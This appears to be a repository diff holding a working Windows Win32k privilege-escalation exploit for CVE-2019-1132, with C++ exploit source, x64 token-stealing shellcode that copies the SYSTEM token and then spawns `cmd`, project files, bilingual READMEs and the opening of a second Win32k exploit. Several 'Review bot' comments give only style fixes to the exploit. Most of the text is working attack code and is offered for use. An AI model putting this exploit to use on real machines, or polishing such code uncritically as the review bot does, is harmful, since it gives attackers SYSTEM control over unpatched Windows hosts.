for (ULONG_PTR i = 0; i < gSharedInfo->psi->cHandleEntries; i++)
{
tmp = gSharedInfo->aheList + i;
HANDLE handle = reinterpret_cast<HANDLE>(tmp->wUniq << 0x10 | i);
if (handle == hWnd)
{
ret = tmp->phead;
if (UserAddr != NULL)
{
*UserAddr = (ULONG_PTR)ret - g_DeltaDesktopHeap;
}
}
}
return ret;
}
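Review bot: The member comments on `GetGdiKernelAddress`, `GetUserObjectAddressBygSharedInfo` and `HmValidateHandle` are the only place this header records which Windows 10 release each lookup stops being usable on, and they are written in Chinese; an English rendering in the same spot would keep that applicability note readable to the rest of the project, e.g. `// usable before RS1; for GDI objects`, `// usable before RS2; for User objects` and `// usable before RS4; returns the user-mode mapped address of a User object, the kernel address follows from head->pSelf`. A point of style in `GetUserObjectAddressBygSharedInfo`: the loop keeps scanning the remaining `cHandleEntries` entries after `handle == hWnd` matches, so a `break;` right after the `UserAddr` update would end the scan at the match and make the single-result intent explicit.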


@ -0,0 +1,481 @@
#include<Windows.h>
#include<iostream>
#include<intrin.h>
#include"leak.h"
using namespace std;
//////////////////////////////////////////////////////////////////////////////////
//
// global variables && prototypes
//
leak p_leak;
DWORD g_MenuCreate = NULL;
bool bOnDrag = false;
PVOID g_fakeWnd = nullptr;
ULONG_PTR g_uDraggingIndex = NULL;
PVOID g_primaryWnd = NULL;
PVOID g_secondWnd = NULL;
HWND g_SparyWindow[0x100] = { 0 };
HWND g_prepareToRead;
PVOID prepareToRead_addr;
#define MN_FINDMENUWINDOWFROMPOINT 0x1EB
void replaceWndProc();
void SetNullPageData();
EXTERN_C void ShellCode();
#ifdef _AMD64_
using pNtAllocateVirtualMemory = NTSTATUS(__fastcall*)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
EXTERN_C void __fastcall NtUserMNDragOver(PPOINT pt, char* buf);
#else
using pNtAllocateVirtualMemory = NTSTATUS(__stdcall*)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
__declspec(naked) void __stdcall NtUserMNDragOver(PPOINT pt, char* buf)
{
__asm
{
mov eax, 0x11ED
mov edx, 0x7FFE0300
call dword ptr[edx]
ret 8
}
}
#endif // _AMD64_
//////////////////////////////////////////////////////////////////////////////////
//
// FakeWindowsProcedure for hMenuSub's tagMenuWnd
//
LRESULT CALLBACK FakeWindowProc(
_In_ HWND hwnd,
_In_ UINT uMsg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
if (uMsg == MN_FINDMENUWINDOWFROMPOINT)
{
SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG_PTR)DefWindowProc);
cout << "wParam:0x" << hex << *(PULONG)wParam << endl;
g_uDraggingIndex = *(PULONG)wParam ;
SetNullPageData();
return (LRESULT)g_fakeWnd;
}
return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
//////////////////////////////////////////////////////////////////////////////////
//
// SetWindowsHookEx's handler
//
LRESULT CALLBACK CallWndProc(
_In_ int nCode,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
PCWPSTRUCT msg = (PCWPSTRUCT)lParam;
//__debugbreak();
if (msg->message == MN_FINDMENUWINDOWFROMPOINT && bOnDrag)
{
cout << "msg: 0x" << hex << msg->message;
cout << "\thwnd: 0x" << hex << msg->hwnd;
auto hwnd_kernel = p_leak.GetUserObjectAddressBygSharedInfo(msg->hwnd, NULL);
cout << "\thwnd_kernel: 0x" << hex << hwnd_kernel << endl;
SetWindowLongPtr(msg->hwnd, GWLP_WNDPROC, (ULONG_PTR)FakeWindowProc);
}
return CallNextHookEx(NULL, nCode, wParam, lParam);
}
//////////////////////////////////////////////////////////////////////////////////
//
// SetWinEventHook's handler
//
void Wineventproc(
HWINEVENTHOOK hWinEventHook,
DWORD event,
HWND hwnd,
LONG idObject,
LONG idChild,
DWORD idEventThread,
DWORD dwmsEventTime
)
{
PVOID hMenuRoot_wnd;
PVOID hMenSub_wnd;
switch (g_MenuCreate)
{
case 0:
//__debugbreak();
SendMessage(hwnd, WM_LBUTTONDOWN, NULL, 0x00050005); //在TrackPopupMenuEx内部通过xxxWindowEvent产生EVENT_SYSTEM_MENUPOPUPSTART事件但是并没有立即产生用户回调
//而是在
//此时是hMenuRoot
hMenuRoot_wnd = p_leak.GetUserObjectAddressBygSharedInfo(hwnd, NULL);
cout << "hMenuRoot_wnd: 0x" << hex << hwnd << "\tkernelAddress: 0x" << hMenuRoot_wnd << endl;
break;
case 1:
//__debugbreak();
/*
bOnDrag = 1; //在这里将bOnDrag置1虽然在WM_MOUSEMOVE消息处理函数xxxMouseMove中调用xxxMNFindWindowFromPoint时返回的是我们伪造的 g_fakeWnd
//但由于tagMenuState->fInDoDragDrop并没有置位因此不会触发调用xxxMNUpdateDraggingInfo的代码路径所以还是通过调用NtUserMNDragOver将fInDoDragDrop置位
*/
SendMessage(hwnd, WM_MOUSEMOVE, NULL, 0x00050005); //当在hWndMain中处理了我们发送的WM_LBUTTONDOWN之后此时hMenuSub会显示同时会触发
//EVENT_SYSTEM_MENUPOPUPSTART用户回调这时发送WM_MOUSEMOVE消息由于鼠标已经是按下情况
//因此会形成拖拽
hMenSub_wnd = p_leak.GetUserObjectAddressBygSharedInfo(hwnd, NULL);
cout << "hMenSub_wnd: 0x" << hex << hwnd << "\tkernelAddress: 0x" << hMenSub_wnd << endl;
break;
default:
break;
}
g_MenuCreate++;
}
//////////////////////////////////////////////////////////////////////////////////
//
// allocated NULL page
//
bool allocNullPage()
{
pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
if (NtAllocateVirtualMemory == NULL)
{
cout << "get NtAllocateVirtualMemory address error\n";
return false;
}
ULONG_PTR addr = 0x100;
ULONG_PTR RegionSize = 0x1000;
auto result = NtAllocateVirtualMemory(GetCurrentProcess(), (PVOID*)&addr, NULL, &RegionSize, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
if (result != 0)
{
cout << "NtAllocateVirtualMemory error code:0x" << hex << result << endl;
return false;
}
return true;
}
//////////////////////////////////////////////////////////////////////////////////
//
// set NULL page data
//
void SetNullPageData()
{
#ifdef _AMD64_
uint8_t NullPage = NULL;
ULONG_PTR offset1 = (ULONG_PTR)g_primaryWnd - g_uDraggingIndex * 0x90; // 注意g_uDraggingIndex必须是ULONG_PTR否则ULONG在x64会发生溢出
offset1 = offset1 + 0xe8 - 0x4;
ULONG_PTR offset2 = (((ULONG_PTR)prepareToRead_addr + 0x128 + 0x90) - offset1 - 0x44) / 0x90; //由于offset2只取了32位而计算出来可能超过32位因此无法重定位到零地址
for (size_t i = 0; i < 0x90; i += 8)
{
//__debugbreak();
SetWindowLongPtr(g_prepareToRead, i, 0x7777777777777777);
}
*(PULONG_PTR)(NullPage + 0x34) = g_uDraggingIndex + 1;
*(PULONG_PTR)(NullPage + 0x50) = offset1;
*(PULONG_PTR)(NullPage + 0x78) = offset2;
#else
uint8_t NullPage = NULL;
ULONG_PTR offset1 = (ULONG_PTR)g_primaryWnd - g_uDraggingIndex * 0x6C; // sizeof(tagItem32) = 0x6C
offset1 = offset1 + 0x90 - 0x4; // point to g_primaryWnd->cbwndExtra
ULONG_PTR offset2 = (0 - offset1) / 0x6C + 2; //如果只+1遇到刚好NullPage + 0x28 + (1*0x6C - offset2_remainder) = 0x4C
//的情况就会覆盖offset2的值导致蓝屏
ULONG_PTR offset2_remainder = (0 - offset1) % 0x6C;
*(PULONG_PTR)(NullPage + 0x20) = g_uDraggingIndex + 1; //tagMENU->cItems, g_uDraggingIndex + 1使得xxxMNSetGapState!MNGetpItem第二次返回0
*(PULONG_PTR)(NullPage + 0x34) = offset1;
*(PULONG_PTR)(NullPage + 0x4C) = offset2;
*(PULONG_PTR)(NullPage + 0x28 + (2 * 0x6C - offset2_remainder)) = 0x7ffffffe;
#endif // _AMD64_
}
//////////////////////////////////////////////////////////////////////////////////
//
// spary window
//
bool SparyWindow()
{
WNDCLASSEXA wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEXA);
wndClass.lpfnWndProc = DefWindowProc;
wndClass.cbClsExtra = 0;
wndClass.cbWndExtra = 0;
wndClass.hInstance = GetModuleHandle(NULL);
wndClass.lpszMenuName = 0;
wndClass.lpszClassName = "SparyClass";
RegisterClassExA(&wndClass);
for (size_t i = 0; i < 0x100; i++)
{
g_SparyWindow[i] = CreateWindowA("SparyClass", NULL, WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, GetModuleHandle(NULL), nullptr);
if (g_SparyWindow[i] == NULL)
{
return false;
}
}
g_primaryWnd = p_leak.GetUserObjectAddressBygSharedInfo(g_SparyWindow[0x98], NULL);
g_secondWnd = p_leak.GetUserObjectAddressBygSharedInfo(g_SparyWindow[0x99], NULL);
if (((ULONG_PTR)g_secondWnd - (ULONG_PTR)g_primaryWnd) > 0x40000000)
{
return false;
}
cout << "g_primaryWnd: 0x" << hex << g_SparyWindow[0x98] << "\tkernelAddress: 0x" << g_primaryWnd << endl;
cout << "g_secondWnd: 0x" << hex << g_SparyWindow[0x99] << "\tkernelAddress: 0x" << g_secondWnd << endl;
#ifdef _AMD64_
WNDCLASSEXA wndClass2 = { 0 };
wndClass2.cbSize = sizeof(WNDCLASSEXA);
wndClass2.lpfnWndProc = DefWindowProc;
wndClass2.cbClsExtra = 0;
wndClass2.cbWndExtra = 0x90;
wndClass2.hInstance = GetModuleHandle(NULL);
wndClass2.lpszMenuName = 0;
wndClass2.lpszClassName = "SparyClass2";
RegisterClassExA(&wndClass2);
g_prepareToRead = CreateWindowA("SparyClass2", NULL, WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, GetModuleHandle(NULL), nullptr);
prepareToRead_addr = p_leak.GetUserObjectAddressBygSharedInfo(g_prepareToRead, NULL);
cout << "g_prepareToRead: 0x" << hex << g_prepareToRead << "\tkernelAddress: 0x" << prepareToRead_addr << endl;
#endif // _AMD64_
return true;
}
//////////////////////////////////////////////////////////////////////////////////
//
// entry point
//
int main()
{
if (!SparyWindow())
{
return false;
}
if (!allocNullPage())
{
cout << "error in alloc null page\n";
return false;
}
SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, NULL, GetCurrentThreadId());
SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, NULL, (WINEVENTPROC)Wineventproc, GetCurrentProcessId(), GetCurrentThreadId(), NULL);
g_fakeWnd = CreateWindowEx(0, L"#32768", L"SB", 0x80800000, 0, 0, 0, 0, 0, 0, 0,0);
HMENU hMenuRoot = CreatePopupMenu();
HMENU hMenuSub = CreatePopupMenu();
MENUINFO mi = { 0 };
mi.cbSize = sizeof(MENUINFO);
mi.fMask = MIM_STYLE;
mi.dwStyle = MNS_MODELESS | MNS_DRAGDROP; //非模态菜单,否则弹出菜单会被销毁
SetMenuInfo(hMenuRoot, &mi);
SetMenuInfo(hMenuSub, &mi);
AppendMenuA(hMenuRoot, MF_BYPOSITION | MF_POPUP, (UINT_PTR)hMenuSub, "Root");
AppendMenuA(hMenuSub, MF_BYPOSITION | MF_POPUP, 0, "Sub");
auto hMenuRoot_kernel = p_leak.GetUserObjectAddressBygSharedInfo(hMenuRoot, NULL);
auto hMenuSub_kernel = p_leak.GetUserObjectAddressBygSharedInfo(hMenuSub, NULL);
cout << "hMenuRoot: 0x" << hex << hMenuRoot << "\tkernelAddress: 0x" << hMenuRoot_kernel << endl;
cout << "hMenuSub: 0x" << hex << hMenuSub << "\tkernelAddress: 0x" << hMenuSub_kernel << endl;
//getchar();
WNDCLASSEXA wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEXA);
wndClass.lpfnWndProc = DefWindowProc;
wndClass.cbClsExtra = 0;
wndClass.cbWndExtra = 0;
wndClass.hInstance = GetModuleHandle(NULL);
wndClass.lpszMenuName = 0;
wndClass.lpszClassName = "WNDCLASSMAIN";
RegisterClassExA(&wndClass);
auto hWndMain = CreateWindowA("WNDCLASSMAIN", "CVE", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, GetModuleHandle(NULL), nullptr);
TrackPopupMenuEx(hMenuRoot, 0, 0, 0, hWndMain, NULL); //RECT会被强制填充为0x14,0x14
{
auto g_fakeWnd_kernel = p_leak.GetUserObjectAddressBygSharedInfo(g_fakeWnd, NULL);
auto hMenuRoot_kernel = p_leak.GetUserObjectAddressBygSharedInfo(hMenuRoot, NULL);
auto hMenuSub_kernel = p_leak.GetUserObjectAddressBygSharedInfo(hMenuSub, NULL);
auto hWndMain_kernel = p_leak.GetUserObjectAddressBygSharedInfo(hWndMain, NULL);
cout << "g_fakeWnd: 0x" << hex << g_fakeWnd << "\tkernelAddress: 0x"<< g_fakeWnd_kernel << endl;
cout << "hMenuRoot: 0x" << hex << hMenuRoot << "\tkernelAddress: 0x" << hMenuRoot_kernel << endl;
cout << "hMenuSub: 0x" << hex << hMenuSub << "\tkernelAddress: 0x" << hMenuSub_kernel << endl;
cout << "hWndMain: 0x" << hex << hWndMain << "\tkernelAddress: 0x" << hWndMain_kernel << endl;
}
cout << "CallWndProc: 0x" << hex << CallWndProc << endl;
MSG msg = { 0 };
while (GetMessage(&msg,NULL,NULL,NULL))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
if (g_MenuCreate == 2)
{
bOnDrag = true;
POINT pt;
char buf[100];
pt.x = 2;
pt.y = 2;
//__debugbreak();
NtUserMNDragOver(&pt, buf);
g_MenuCreate++;
break;
}
}
DestroyWindow((HWND)g_fakeWnd);
DestroyWindow(hWndMain);
DestroyMenu(hMenuRoot);
DestroyMenu(hMenuSub);
replaceWndProc();
return true;
}
LRESULT CALLBACK WndProc_kernel(
_In_ HWND hwnd,
_In_ UINT uMsg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
#ifdef _AMD64_
ShellCode();
#else
__asm {
pushad
mov eax, fs: [0x124] //CurrentThread
mov eax, [eax + 0x150] //Process
lea edx, [eax + 0xf8] //MyProcess.Token
noFind :
mov eax, [eax + 0xb8] //Eprocess.ActiveProcessLinks
sub eax, 0xb8 //next Eprocess struct
mov ebx, [eax + 0xb4] //PID
cmp ebx, 4
jnz noFind
mov eax, [eax + 0xf8] //System.Token
mov[edx], eax
popad
}
#endif // _AMD64_
SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG_PTR)DefWindowProc);
return false;
}
void replaceWndProc()
{
#ifdef _AMD64_
ULONG_PTR offset = (((ULONG_PTR)g_secondWnd + 0x90) - ((ULONG_PTR)g_primaryWnd + 0x128));
#else
ULONG_PTR offset = (((ULONG_PTR)g_secondWnd + 0x60) - ((ULONG_PTR)g_primaryWnd + 0xb0));
#endif // _AMD64_
SetWindowLongPtr(g_SparyWindow[0x98], offset, (ULONG_PTR)WndProc_kernel);
SendMessage(g_SparyWindow[0x99], WM_MOUSEMOVE, NULL, 0x00050005); //触发g_secondWnd的消息处理函数
system("cmd");
DestroyWindow(g_SparyWindow[0x98]);
DestroyWindow(g_SparyWindow[0x99]);
}
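Review bot: The failure paths in `main` after the `SparyWindow()` and `allocNullPage()` checks use `return false;`, which from `int main` is exit status 0 and therefore indistinguishable from the `return true;` at the end of the function; `return 1;` on the failure paths and `return 0;` at the end would give a harness a usable result. A point of style: the block following `TrackPopupMenuEx` redeclares `hMenuRoot_kernel` and `hMenuSub_kernel`, shadowing the variables of the same names declared earlier in `main`; reusing the outer variables or renaming the inner ones avoids the shadowing warning. The inline comments in `Wineventproc`, `SetNullPageData` and `replaceWndProc` are the only explanation of the non-obvious constants there and are in Chinese, so an English rendering placed on the same lines would help the next reader.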


@ -0,0 +1,44 @@
public ShellCode
public NtUserMNDragOver
.code
ShellCode proc
pushfq
push rax
push rdx
push rbx
mov rax, gs:[188h] ;CurrentThread
mov rax, [rax + 210h] ;Process
lea rdx, [rax + 208h] ;MyProcess.Token
noFind :
mov rax, [rax + 188h] ;Eprocess.ActiveProcessLinks
sub rax, 188h ;next Eprocess struct
mov rbx, [rax + 180h] ;PID
cmp rbx, 4
jnz noFind
mov rax, [rax + 208h] ;System.Token
mov [rdx], rax
pop rbx
pop rdx
pop rax
popfq
ret
ShellCode endp
NtUserMNDragOver proc
mov r10, rcx
mov eax, 12DEh
syscall
ret
NtUserMNDragOver endp
end


@ -0,0 +1,33 @@
### CVE-2019-1132
#### 描述
Win32k特权提升漏洞
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows 7 | x64/x86 | | SP1 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1132
```
#### 利用方式
暂无
#### 分析文档
- https://zhuanlan.zhihu.com/p/335166796
- https://ti.qianxin.com/blog/articles/buhtrap-cve-2019-1132-attack-event-related-vulnerability-sample-analysis/
- https://www.welivesecurity.com/2019/07/10/windows-zero-day-cve-2019-1132-exploit/
- https://www.anquanke.com/post/id/181794


@ -0,0 +1,34 @@
### CVE-2019-1132
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows 7 | x64/x86 | | SP1 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1132
```
#### Utilization
None
#### Analyze
- https://zhuanlan.zhihu.com/p/335166796
- https://ti.qianxin.com/blog/articles/buhtrap-cve-2019-1132-attack-event-related-vulnerability-sample-analysis/
- https://www.welivesecurity.com/2019/07/10/windows-zero-day-cve-2019-1132-exploit/
- https://www.anquanke.com/post/id/181794


@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.539
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2019-1132", "cve-2019-1132.vcxproj", "{998F330A-9512-4212-BC87-A6867DC715D9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{998F330A-9512-4212-BC87-A6867DC715D9}.Debug|x64.ActiveCfg = Debug|x64
{998F330A-9512-4212-BC87-A6867DC715D9}.Debug|x64.Build.0 = Debug|x64
{998F330A-9512-4212-BC87-A6867DC715D9}.Debug|x86.ActiveCfg = Debug|Win32
{998F330A-9512-4212-BC87-A6867DC715D9}.Debug|x86.Build.0 = Debug|Win32
{998F330A-9512-4212-BC87-A6867DC715D9}.Release|x64.ActiveCfg = Release|x64
{998F330A-9512-4212-BC87-A6867DC715D9}.Release|x64.Build.0 = Release|x64
{998F330A-9512-4212-BC87-A6867DC715D9}.Release|x86.ActiveCfg = Release|Win32
{998F330A-9512-4212-BC87-A6867DC715D9}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {34444CE2-76FE-414E-8862-2F2B23514E75}
EndGlobalSection
EndGlobal


@ -0,0 +1,124 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>15.0</VCProjectVersion>
<ProjectGuid>{998F330A-9512-4212-BC87-A6867DC715D9}</ProjectGuid>
<RootNamespace>cve20191132</RootNamespace>
<WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>


@ -0,0 +1,373 @@
#include <Windows.h>
#include <iostream>
/* PREPROCESSOR DEFINITIONS */
#define MN_SELECTITEM 0x1E5
#define MN_SELECTFIRSTVALIDITEM 0x1E7
#define MN_OPENHIERARCHY 0x01E3
#define MN_CANCELMENUS 0x1E6
#define MN_BUTTONDOWN 0x1ed
#define WM_EX_TRIGGER 0x6789
#define NtCurrentProcess() (HANDLE)-1
#define NtCurrentThread() (HANDLE)-1
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define TYPE_WINDOW 1
/* GLOBAL VARIABLES */
static BOOL hWindowHuntDestroy = FALSE;
static BOOL bEnterEvent = FALSE;
static BOOL success = FALSE;
static HMENU hMenuList[3] = { 0 };
static HWND hWindowMain = NULL;
static HWND hWindowHunt = NULL;
static HWND hwndMenuList[3] = { 0 };
static PVOID MemAddr = (PVOID)1;
static SIZE_T MemSize = 0x1000;
static DWORD iCount = 0;
static DWORD release = 0;
/* Structure definition of win32k!tagWND returned by xxHMValidateHandle */
typedef struct _HEAD {
HANDLE h;
DWORD cLockObj;
} HEAD, *PHEAD;
typedef struct _THROBJHEAD {
HEAD head;
PVOID pti;
} THROBJHEAD, *PTHROBJHEAD;
typedef struct _DESKHEAD {
PVOID rpdesk;
PBYTE pSelf;
} DESKHEAD, *PDESKHEAD;
typedef struct _THRDESKHEAD {
THROBJHEAD thread;
DESKHEAD deskhead;
} THRDESKHEAD, *PTHRDESKHEAD;
/* Definition of xxHMValidateHandle */
static PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL;
/* Defintion of NtallocateVirtualMemory */
typedef
NTSTATUS
(WINAPI *pfNtAllocateVirtualMemory) (
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
pfNtAllocateVirtualMemory NtAllocateVirtualMemory = NULL;
static
VOID
xxGetHMValidateHandle(VOID)
{
HMODULE hModule = LoadLibraryA("USER32.DLL");
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
PBYTE Address = NULL;
for (INT i = 0; i < 0x30; i++)
{
if (*(WORD *)(i + pfnIsMenu) != 0x02B2)
{
continue;
}
i += 2;
if (*(BYTE *)(i + pfnIsMenu) != 0xE8)
{
continue;
}
Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu;
Address = Address + i + 5;
pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address;
break;
}
}
static
PVOID
xxHMValidateHandleEx(HWND hwnd)
{
return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW);
}
static
PVOID
xxHMValidateHandle(HWND hwnd)
{
PVOID RetAddr = NULL;
if (!pfnHMValidateHandle)
{
xxGetHMValidateHandle();
}
if (pfnHMValidateHandle)
{
RetAddr = xxHMValidateHandleEx(hwnd);
}
return RetAddr;
}
static
BOOL
xxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra, WNDPROC pfnProc = DefWindowProcW)
{
WNDCLASSEXW wc = { 0 };
wc.cbSize = sizeof(WNDCLASSEXW);
wc.lpfnWndProc = pfnProc;
wc.cbWndExtra = cbWndExtra;
wc.hInstance = GetModuleHandleA(NULL);
wc.lpszMenuName = NULL;
wc.lpszClassName = lpszClassName;
return RegisterClassExW(&wc);
}
static
HWND
xxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle, HINSTANCE hInstance = NULL, HWND hwndParent = NULL)
{
return CreateWindowExW(dwExStyle,
lpszClassName,
NULL,
dwStyle,
0,
0,
1,
1,
hwndParent,
NULL,
hInstance,
NULL);
}
static
LRESULT
CALLBACK
xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
{
tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;
if (cwp->message == WM_NCCREATE && bEnterEvent && hwndMenuList[release] && !hwndMenuList[release+1])
{
printf("Sending the MN_CANCELMENUS message\n");
SendMessage(hwndMenuList[release], MN_CANCELMENUS, 0, 0);
